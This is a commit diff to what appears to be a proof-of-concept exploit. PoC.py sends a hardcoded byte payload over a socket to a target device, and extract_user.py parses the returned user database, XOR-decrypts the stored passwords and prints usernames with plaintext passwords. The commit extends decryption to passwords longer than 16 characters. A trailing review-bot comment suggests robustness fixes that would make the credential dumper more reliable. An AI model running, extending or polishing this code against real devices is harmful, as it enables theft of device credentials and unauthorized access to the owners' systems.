
Commit 97cb799

Update extract_user to support passwords longer than 16 chars
1 parent d7154fc commit 97cb799


2 files changed

+30
-19
lines changed


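--- a/PoC.py
+++ b/PoC.py
@@ -2,7 +2,7 @@
 
 import socket
 import sys
-from extract_user import get_from_network
+from extract_user import dump
 
 
 a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
@@ -59,4 +59,4 @@
 
 #Get results
 print(ip)
-get_from_network(d[55:])
+dump(d[55:])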

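--- a/extract_user.py
+++ b/extract_user.py
@@ -7,45 +7,56 @@ def decrypt_password(user, pass_enc):
 
     passw = ""
     for i in range(0, len(pass_enc)):
-        passw += chr(pass_enc[i] ^ key[i])
+        passw += chr(pass_enc[i] ^ key[i % len(key)])
 
     return passw.split("\x00")[0]
 
+def extract_user_pass_from_entry(entry):
+    user_data = entry.split(b"\x01\x00\x00\x21")[1]
+    pass_data = entry.split(b"\x11\x00\x00\x21")[1]
+
+    user_len = user_data[0]
+    pass_len = pass_data[0]
+
+    username = user_data[1:1 + user_len]
+    password = pass_data[1:1 + pass_len]
+
+    return username, password
 
 def get_pair(data):
 
     user_list = []
 
     entries = data.split(b"M2")[1:]
     for entry in entries:
-        user_len = entry.split(b"\x01\x00\x00\x21")[1][0]
-        pass_len = entry.split(b"\x11\x00\x00\x21")[1][0]
-
-        user = entry.split(b"\x01\x00\x00\x21")[1][1:1 + user_len]
-        pass_enc = entry.split(b"\x11\x00\x00\x21")[1][1:1 + pass_len]
+        try:
+            user, pass_encrypted = extract_user_pass_from_entry(entry)
+        except:
+            continue
 
-        passw = decrypt_password(user, pass_enc)
+        pass_plain = decrypt_password(user, pass_encrypted)
         user = user.decode("ascii")
 
-        user_list.append((user, passw))
+        user_list.append((user, pass_plain))
 
     return user_list
 
-def get_from_network(pload):
-    user_pass = get_pair(pload)
+def dump(data):
+    user_pass = get_pair(data)
     for u, p in user_pass:
         print("User:", u)
         print("Pass:", p)
         print()
 
 if __name__ == "__main__":
     if len(sys.argv) == 2:
-        user_file = open(sys.argv[1], "rb").read()
-        user_pass = get_pair(user_file)
-        for u, p in user_pass:
-            print("User:", u)
-            print("Pass:", p)
-            print()
+        if sys.argv[1] == "-":
+            user_file = sys.stdin.buffer.read()
+        else:
+            user_file = open(sys.argv[1], "rb").read()
+        dump(user_file)
+
     else:
         print("Usage:")
-        print(sys.argv[0], "user.dat")
+        print("\tFrom file: \t", sys.argv[0], "user.dat")
+        print("\tFrom stdin:\t", sys.argv[0], "-")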
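Review bot: The bare `except:` at new line 34 swallows every exception, including KeyboardInterrupt and SystemExit, and hides any real parsing bug as a silently skipped entry; the only failure `extract_user_pass_from_entry` should be expected to raise is the IndexError from `split(...)[1]` when a delimiter is absent, so narrow it to `except IndexError:`. The `user.decode("ascii")` at line 38 sits outside that `try`, so one entry with a non-ASCII byte in the username field still aborts the whole loop with UnicodeDecodeError on input that is, by construction, untrusted; move the decode inside the guarded region or use `user.decode("ascii", errors="replace")`. The slices `user_data[1:1 + user_len]` and `pass_data[1:1 + pass_len]` at lines 21-22 silently truncate on a short entry rather than failing, which is worth a comment such as `# NOTE: a truncated entry yields a short field, not an error`. Separately, `open(sys.argv[1], "rb").read()` at line 56 never closes the handle; `with open(sys.argv[1], "rb") as f: user_file = f.read()` is the idiomatic form. `key` is not defined within the hunk, so `key[i % len(key)]` presumes a non-empty key — confirm where it is assigned above line 7.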
